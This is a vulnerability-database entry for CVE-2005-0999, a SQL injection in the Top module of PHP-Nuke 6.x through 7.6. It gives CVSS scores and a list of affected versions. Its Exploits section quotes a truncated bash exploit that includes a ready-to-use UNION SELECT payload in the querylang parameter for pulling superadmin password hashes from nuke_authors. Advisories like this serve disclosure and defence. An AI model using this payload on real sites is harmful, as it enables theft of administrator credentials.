7.5
CVSSv2

CVE-2005-0999

Published: 02/05/2005 Updated: 18/10/2016
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in the Top module for PHP-Nuke 6.x up to and including 7.6 allows remote malicious users to execute arbitrary SQL commands via the querylang parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

francisco burzi php-nuke 6.5 beta1

francisco burzi php-nuke 6.5

francisco burzi php-nuke 7.0

francisco burzi php-nuke 7.4

francisco burzi php-nuke 7.5

francisco burzi php-nuke 7.2

francisco burzi php-nuke 7.0 final

francisco burzi php-nuke 6.5 rc2

francisco burzi php-nuke 7.3

francisco burzi php-nuke 6.5 rc3

francisco burzi php-nuke 7.6

francisco burzi php-nuke 6.0

francisco burzi php-nuke 6.5 final

francisco burzi php-nuke 6.7

francisco burzi php-nuke 6.6

francisco burzi php-nuke 6.9

francisco burzi php-nuke 7.1

francisco burzi php-nuke 6.5 rc1

Exploits

#/bin/bash # This is just basic-ly modulesphp?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1 # works thou /str0ke # # PHPNuke Top Module Remote SQL Injection # by Fabrizi Andrea 2005 # andreafabrizi [at] gmailcom # # Work with the PHPNuke latest version! # URL=$1; PATH="$2/"; ANON="ano ...